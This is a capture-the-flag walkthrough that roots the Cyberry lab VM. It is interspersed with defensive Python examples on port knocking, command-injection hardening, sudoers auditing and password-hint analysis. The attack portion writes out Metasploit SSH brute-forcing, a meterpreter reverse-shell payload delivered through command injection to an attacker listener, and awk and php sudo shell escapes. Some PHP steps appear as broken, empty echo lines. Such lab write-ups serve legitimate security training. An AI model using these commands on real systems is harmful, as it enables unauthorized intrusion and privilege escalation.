Hello friends!
Today we are going to take on another CTF challenge known as Cyberry: 1. The credit for making this VM goes to “Cyberry”, and it is another boot2root challenge where we have to root the server to complete the challenge. You can download this VM here.
Let’s Breach!!!
Let us start by finding the IP of the VM (here I have it at 192.168.0.18, but you will have to find your own):
netdiscover
Use nmap for port enumeration
nmap -sT 192.168.0.18
The nmap scan shows us that port 80 is open, so we open the IP address in our browser.
We don’t find anything on the webpage, so we use nikto to gather more information.
nikto -h http://192.168.0.18
Nikto scan shows us the login page. We open http://192.168.0.18/login.php on the browser.
We don’t find anything on the login page except a link to the main site http://192.168.0.18/berrypedia.html.
While going through the links on the page, I found an image called placeho1der.jpg.
On further research I found that they all sang the same song “I hear
you knocking”. From the name of the song and the port image, I concluded it had
something to do with port knocking. So I used the release date of the song as
the port.
knock 192.168.0.18 1970 1955 1955 1961
After port knocking we ran another nmap scan to check whether any new port was open, and we find that port 61955 opened after the knock.
nmap -p- 192.168.0.18
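To make the mechanism behind that step concrete, here is a small model of what a knock daemon does on the server side: it watches the destination ports each source hits, advances a per-source counter while the hits follow the configured sequence, and only then treats the protected port as reachable for that source. This is an added example written for this page, not code from the original post or from the Cyberry VM; the sequence 1970, 1955, 1955, 1961 and the port 61955 are taken from the write-up, while the iptables-style log format and the sample lines are constructed.

```python
import re
from collections import defaultdict

# Values from the write-up: the knock sequence and the port it unlocks.
KNOCK_SEQUENCE = (1970, 1955, 1955, 1961)
PROTECTED_PORT = 61955

# Extracts SRC= and DPT= from an iptables-style LOG line (constructed format).
_LOG_RE = re.compile(r"SRC=(?P<src>\d{1,3}(?:\.\d{1,3}){3}).*?DPT=(?P<dpt>\d+)")

# Constructed sample: one source knocks correctly, another hits the ports out of order.
SAMPLE_LOG = [
    "Jan  1 12:00:01 cyberry kernel: KNOCK IN=eth0 SRC=192.168.0.12 DST=192.168.0.18 PROTO=TCP DPT=1970",
    "Jan  1 12:00:02 cyberry kernel: KNOCK IN=eth0 SRC=192.168.0.12 DST=192.168.0.18 PROTO=TCP DPT=1955",
    "Jan  1 12:00:03 cyberry kernel: KNOCK IN=eth0 SRC=192.168.0.12 DST=192.168.0.18 PROTO=TCP DPT=1955",
    "Jan  1 12:00:04 cyberry kernel: KNOCK IN=eth0 SRC=192.168.0.12 DST=192.168.0.18 PROTO=TCP DPT=1961",
    "Jan  1 12:00:05 cyberry kernel: KNOCK IN=eth0 SRC=192.168.0.77 DST=192.168.0.18 PROTO=TCP DPT=1970",
    "Jan  1 12:00:06 cyberry kernel: KNOCK IN=eth0 SRC=192.168.0.77 DST=192.168.0.18 PROTO=TCP DPT=1961",
    "Jan  1 12:00:07 cyberry kernel: KNOCK IN=eth0 SRC=192.168.0.77 DST=192.168.0.18 PROTO=TCP DPT=1955",
    "Jan  1 12:00:08 cyberry kernel: KNOCK IN=eth0 SRC=192.168.0.77 DST=192.168.0.18 PROTO=TCP DPT=1961",
]


def parse_knock_events(log_lines):
    """Turn firewall log lines into (source_ip, destination_port) events, in order."""
    events = []
    for line in log_lines:
        m = _LOG_RE.search(line)
        if m:
            events.append((m.group("src"), int(m.group("dpt"))))
    return events


def completed_knockers(events, sequence=KNOCK_SEQUENCE):
    """Return the set of sources that hit every port of `sequence` in order.

    Each source keeps an index into the sequence. A hit on the expected port
    advances it; any other port resets it, except that a hit on the first port
    of the sequence starts a fresh attempt. Reaching the end marks the source
    as having completed the knock.
    """
    progress = defaultdict(int)
    opened = set()
    for src, port in events:
        idx = progress[src]
        if port == sequence[idx]:
            idx += 1
        elif port == sequence[0]:
            idx = 1
        else:
            idx = 0
        if idx == len(sequence):
            opened.add(src)
            idx = 0
        progress[src] = idx
    return opened


def port_allowed(src, dport, opened):
    """Filter decision: the protected port is reachable only for sources that knocked."""
    return dport != PROTECTED_PORT or src in opened


if __name__ == "__main__":
    knocked = completed_knockers(parse_knock_events(SAMPLE_LOG))
    print("sources that completed the sequence:", sorted(knocked))
```

The model also shows why the write-up's second nmap scan only sees 61955 from the scanning host: the unlock is per source address, so a scan from any other machine still gets no answer on that port.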
We try netcat but are shown nothing, so we open the port in our browser and find that it is running the same website on a different port.
We use dirb to check if there are any
different directories on this port.
We find a new directory http://192.168.0.18:61955/H, we open it
and find brain-fuck encoded strings.
We use an online tool to decode the strings one by one and find a list of usernames and passwords. We save the usernames in one text file and the passwords in another.
Now we try to brute force ssh using these
credentials. We use metasploit to brute force ssh.
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set rhosts 192.168.0.18
msf auxiliary(ssh_login) > set user_file /root/user.txt
msf auxiliary(ssh_login) > set pass_file /root/pass.txt
msf auxiliary(ssh_login) > run
We find that the username is mary and
password is bakeoff, but we cannot connect through ssh using these credentials.
So we use these to login through ftp.
ftp 192.168.0.18
After logging in through ftp we go inside the .bash_history directory, where we find 2 files.
We download them to our system and rename them.
get .reminder.enc /root/reminder
get .trash /root/trash
We check the file types and find that reminder is encrypted and trash contains passwords to decrypt it.
file reminder
file trash
cat trash
Now we use openssl to decrypt it. We write a shell loop, as there are multiple passwords and multiple ciphers to try, and save each attempt in a file named decrypted{cipher}{password}.
for i in $(openssl enc -ciphers | tail -n +2); do for j in $(cat trash); do openssl ${i:1} -d -salt -md md5 -in reminder -out "decrypted$i$j" -k $j; done; done 2>/dev/null
Now we check which of the decrypted files contain ASCII text.
file * | grep ASCII
We open the file that contains ASCII text
and find it contains a password.
We use this password to login at http://192.168.0.18:61955/login.php.
We use the username we used earlier to brute force ssh and find the username to
be mary.
Once we log in we find a link to another page.
When we open the link we find a page that performs DNS lookups; it looks like it may be vulnerable to command injection.
msf > use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) > set payload php/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost 192.168.0.12
msf exploit(multi/script/web_delivery) > set lport 4444
msf exploit(multi/script/web_delivery) > run
We use Burp Suite to capture the request and inject the command given by metasploit so that the server executes our shell.
As soon as we execute the command we get
our reverse shell.
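The flaw that gives up the shell here is the lookup page passing the submitted name straight to a shell. The following added example (written for this page, not the VM's own PHP) shows the vulnerable construction next to its hardened form, and a small detector that runs the same host-name check over web-server access logs to spot lookup requests that could never have been a legitimate name. The script path /lookup.php and the parameter name `host` are assumptions, as are the sample log lines.

```python
import re
import subprocess
from urllib.parse import parse_qs, urlsplit

# RFC 1123 host-name label: letters, digits and hyphens, no leading or trailing hyphen.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(rf"^{_LABEL}(?:\.{_LABEL})*\.?$")


def is_valid_hostname(value):
    """Allow-list check: only a syntactically valid DNS name passes."""
    return 0 < len(value) <= 253 and _HOSTNAME_RE.match(value) is not None


def build_lookup_command_unsafe(host):
    """The flawed pattern: untrusted input spliced into a string a shell will parse.
    Returned as text for inspection only; it is never executed here."""
    return f"nslookup {host}"


def build_lookup_argv(host):
    """Hardened form: validate first, then pass the value as one argv element.
    Raises ValueError for anything that is not a host name."""
    if not is_valid_hostname(host):
        raise ValueError(f"rejected lookup target: {host!r}")
    return ["nslookup", host]


def run_lookup(host, timeout=5):
    """Run the hardened command with no shell involved (shell=False is the default)."""
    return subprocess.run(build_lookup_argv(host), capture_output=True, text=True, timeout=timeout)


# Constructed access-log lines in common log format; /lookup.php and `host` are assumed names.
SAMPLE_ACCESS_LOG = [
    '192.168.0.50 - - [01/Jan/2018:12:00:00 +0000] "GET /lookup.php?host=example.com HTTP/1.1" 200 512',
    '192.168.0.12 - - [01/Jan/2018:12:00:05 +0000] "GET /lookup.php?host=example.com%3Bid HTTP/1.1" 200 640',
    '192.168.0.50 - - [01/Jan/2018:12:00:09 +0000] "GET /index.php HTTP/1.1" 200 100',
    '192.168.0.12 - - [01/Jan/2018:12:00:15 +0000] "GET /lookup.php?host=example.com%24%28id%29 HTTP/1.1" 200 700',
]
_REQ_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (?P<target>\S+) HTTP')


def flag_suspicious_lookups(log_lines, param="host"):
    """Return (client_ip, decoded_value) for lookup requests whose parameter is not a host name."""
    flagged = []
    for line in log_lines:
        m = _REQ_RE.match(line)
        if not m:
            continue
        query = parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)
        for value in query.get(param, []):  # parse_qs percent-decodes the value
            if not is_valid_hostname(value):
                flagged.append((m.group("ip"), value))
    return flagged


if __name__ == "__main__":
    print("unsafe:", build_lookup_command_unsafe("example.com; id"))
    print("hardened argv:", build_lookup_argv("example.com"))
    for ip, value in flag_suspicious_lookups(SAMPLE_ACCESS_LOG):
        print(f"suspicious lookup from {ip}: {value!r}")
```

Validation and argv passing are complementary: the argv list stops the shell from ever seeing metacharacters, and the allow-list stops values the lookup tool itself might misinterpret, such as option-like strings starting with a hyphen.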
Now we spawn a Python TTY shell.
python -c "import pty; pty.spawn('/bin/bash')"
We find a few files; when we open nb-latin we find it contains a few passwords.
We download the ‘nb-latin’ file to use it
to bruteforce ssh using the username we found earlier.
We use metasploit to bruteforce ssh using
the new password file we found.
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.0.18
msf auxiliary(scanner/ssh/ssh_login) > set user_file user.txt
msf auxiliary(scanner/ssh/ssh_login) > set pass_file nb-latin
msf auxiliary(scanner/ssh/ssh_login) > run
We find the password for nick to be custodio. Once we log in through ssh we check the sudoers list, and there are 2 files we can run as user terry.
sudo -u terry /home/nick/invoke.sh /bin/bash
Now we are logged in as terry, and we again check the sudoers list. We find that we can run awk as user halle, so we spawn a shell using awk as user halle.
sudo -u halle awk 'BEGIN {system("/bin/bash -i")}'
As soon as we spawn the shell we are logged in as halle. We again check the sudoers list and find we can run php as user chuck. When we spawn a tty shell as chuck it crashes, so we create a php file to enumerate directories. We find a directory called .deleted/
echo ”
> /tmp/shell.php
sudo -u chuck php /tmp/shell.php
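Every hop in this chain comes from a sudoers rule that lets one user run, as another, something that can execute arbitrary commands: a script under the caller's own home directory, then awk, then php. The following added audit (written for this page, not a tool from the original post) parses sudoers-style user specifications and flags the rule shapes that effectively grant a shell. The sample rules are constructed to mirror the chain described in the write-up; the VM's real sudoers file is not shown on the page.

```python
import re

# Binaries that will run an arbitrary command for whoever invokes them;
# awk, php and bash from the write-up's chain are all in this set.
SHELL_CAPABLE = {"bash", "sh", "dash", "awk", "gawk", "php", "python", "python3", "perl"}

# user  host=(runas) [TAG:]* command[, command ...]
_RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^\s=]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$"
)

# Constructed sample, modelled on the privilege chain in the write-up.
SAMPLE_SUDOERS = [
    "# constructed sample, not the VM's real /etc/sudoers",
    "nick   ALL=(terry) NOPASSWD: /home/nick/invoke.sh",
    "terry  ALL=(halle) NOPASSWD: /usr/bin/awk",
    "halle  ALL=(chuck) NOPASSWD: /usr/bin/php",
    "deploy ALL=(root)  NOPASSWD: /usr/bin/systemctl restart nginx",
]


def parse_sudoers_line(line):
    """Parse one user-specification line; None for comments, blanks, Defaults and aliases."""
    line = line.split("#", 1)[0].strip()
    if not line or line.startswith(("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias")):
        return None
    m = _RULE_RE.match(line)
    if not m:
        return None
    return {
        "user": m.group("user"),
        "runas": (m.group("runas") or "root").split(":")[0].strip(),
        "nopasswd": "NOPASSWD:" in m.group("tags"),
        "commands": [c.strip() for c in m.group("cmds").split(",") if c.strip()],
    }


def audit_sudoers(lines):
    """Return (user, runas, command, reason) for every rule that effectively grants a shell."""
    findings = []
    for line in lines:
        rule = parse_sudoers_line(line)
        if rule is None:
            continue
        for cmd in rule["commands"]:
            path = cmd.split()[0]
            name = path.rsplit("/", 1)[-1]
            if cmd == "ALL":
                reason = "any command allowed"
            elif name in SHELL_CAPABLE:
                reason = "interpreter or shell executes arbitrary commands"
            elif path.startswith("/home/"):
                reason = "script in a home directory can be edited by its owner"
            elif not path.startswith("/"):
                reason = "relative path resolves through the caller's PATH"
            else:
                continue
            findings.append((rule["user"], rule["runas"], cmd, reason))
    return findings


if __name__ == "__main__":
    for user, runas, cmd, reason in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{user} -> {runas}: {cmd}  [{reason}]")
```

The fix for each finding is the same in spirit: grant a specific, non-interpreting command with a fixed argument list, owned by root and not writable by the calling user, rather than an interpreter or a script the caller controls.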
When we go inside the .deleted folder we find a file called deleted.
echo ”
> /tmp/shell.php
sudo -u chuck php /tmp/shell.php
Now we create a php file to open the file
called deleted.
echo ” > /tmp/shell.php
sudo -u chuck php /tmp/shell.php
Once we open the file we get a hint for the password: ‘e’ is used thrice, [c,r,b,a] are each used twice and [h,w,m,y] are each used once, which makes the password 15 characters long. Also, the password starts with che, ends with rry and contains baca in between.
We use crunch to create dictionaries with
che at start and rry at end with baca at different positions.
We then merge all the dictionaries into one using dymerge.
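The hint is worth quantifying, because it is the reason a 15-character password falls to an online guess. The following added example (written for this page in Python rather than crunch and dymerge, and not code from the original post) turns the hint into constraints, counts how many strings satisfy them, and contrasts that with the number of strings that only the letter counts would allow. It generalizes the write-up's fixed-position crunch runs: the free letters are permuted and the baca block is slid through every position, and the results are deduplicated.

```python
from collections import Counter
from itertools import permutations
from math import factorial

# The hint from the write-up, expressed as constraints.
LETTER_COUNTS = Counter({"e": 3, "c": 2, "r": 2, "b": 2, "a": 2, "h": 1, "w": 1, "m": 1, "y": 1})
PREFIX, INFIX, SUFFIX = "che", "baca", "rry"
LENGTH = 15


def matches_hint(candidate):
    """True if a string satisfies every constraint the hint states."""
    return (
        len(candidate) == LENGTH
        and candidate.startswith(PREFIX)
        and candidate.endswith(SUFFIX)
        and INFIX in candidate[len(PREFIX):-len(SUFFIX)]
        and Counter(candidate) == LETTER_COUNTS
    )


def leftover_letters():
    """Letters still unplaced once the fixed prefix, infix and suffix are taken out."""
    remaining = LETTER_COUNTS - Counter(PREFIX + INFIX + SUFFIX)
    if sum(remaining.values()) != LENGTH - len(PREFIX + INFIX + SUFFIX):
        raise ValueError("hint is inconsistent: letter counts do not fit the length")
    return "".join(sorted(remaining.elements()))


def candidates():
    """Every distinct string consistent with the hint."""
    free = leftover_letters()
    result = set()
    for perm in set(permutations(free)):        # arrangements of the free letters
        body = "".join(perm)
        for k in range(len(body) + 1):           # slide the infix block through the body
            result.add(PREFIX + body[:k] + INFIX + body[k:] + SUFFIX)
    return sorted(result)


def arrangements_from_counts_only():
    """Distinct 15-letter strings with the right letter counts but no positional hint."""
    total = factorial(LENGTH)
    for n in LETTER_COUNTS.values():
        total //= factorial(n)
    return total


if __name__ == "__main__":
    cands = candidates()
    print(f"letter counts alone: {arrangements_from_counts_only():,} strings")
    print(f"with the positional hints: {len(cands)} strings")
    print("first few:", cands[:5])
```

With only the letter counts there are about 13.6 billion possibilities; the fixed prefix, suffix and infix cut that to a few hundred, small enough for the single ssh brute-force run the write-up describes. That is the practical lesson for anyone writing password reminders.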
We add root to the dictionary we used first
to brute-force ssh.
Now we use metasploit to brute force ssh using the new dictionaries.
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.0.18
msf auxiliary(scanner/ssh/ssh_login) > set user_file user.txt
msf auxiliary(scanner/ssh/ssh_login) > set pass_file password.txt
msf auxiliary(scanner/ssh/ssh_login) > run
We find the username to be ‘root’ and the password to be ‘chewbacabemerry’. We take the session and are logged in as root.